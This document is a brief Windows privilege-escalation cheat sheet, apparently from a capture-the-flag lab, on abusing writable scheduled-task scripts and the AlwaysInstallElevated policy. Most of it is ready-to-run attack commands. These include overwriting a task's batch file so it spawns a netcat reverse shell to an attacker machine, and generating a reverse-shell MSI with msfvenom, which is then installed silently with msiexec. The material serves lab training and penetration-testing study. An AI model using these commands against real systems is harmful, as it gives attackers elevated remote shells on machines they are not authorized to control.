Quick misconfiguration wins
1 Escalate through misconfigurations 1.1 Scheduled tasks (OR) 1.2 AlwaysInstallElevated
List scheduled tasks:
C:\> schtasks /query /tn vulntask /fo list /v Folder: \ HostName: THM-PC1 TaskName: \vulntask Task To Run: C:\tasks\schtask.bat Run As User: taskusr1 ...
Task To Run is of interest. If the current user can modify or overwrite the executable, we can control what
gets executed by the
taskusr1 user, giving a simple privilege escalation.
Check the file permissions on the executable:
C:\> icacls c:\tasks\schtask.bat c:\tasks\schtask.bat NT AUTHORITY\SYSTEM:(I)(F) BUILTIN\Administrators:(I)(F) BUILTIN\Users:(I)(F)
In this case, the
BUILTIN\Users group has full access (F) over the task’s binary. This means we can modify the
.bat file and insert any payload.
.bat file to spawn a reverse shell:
C:\> echo c:\tools\nc64.exe -e cmd.exe <IP address attack machine> 4444 > C:\tasks\schtask.bat
And start a listener on the attack machine:
nc -lvp 4444
The next time the scheduled task runs, you should receive the reverse shell with
taskusr1 privileges. Depending on
when the task is scheduled to run, this may take a looong time.
Query the registry values:
C:\> reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer C:\> reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer
Both should be set for this exploitation to work.
Generate an evil
msfvenom -p windows/x64/shell_reverse_tcp LHOST=<IP address attack machine> LPORT=<port-number> -f msi -o evil.msi
Run the Metasploit Handler module configured accordingly.
Transfer the file to
C:\Windows\Tempon the target machine.
Run the installer with the command below and receive the reverse shell:
C:\> msiexec /quiet /qn /i C:\Windows\Temp\evil.msi
These belong more to the realm of CTF events rather than real world scenarios.
Looking into scheduled tasks on the target system, you may see a scheduled task that either lost its binary or it’s using a binary you can modify.
Windows installer files (
.msifiles) are used to install applications on the system. They usually run with the privilege level of the user that starts it. And they can be configured to run with higher privileges from any user account (even unprivileged ones). This could potentially allow for generating a malicious
.msifile that would run with admin privileges.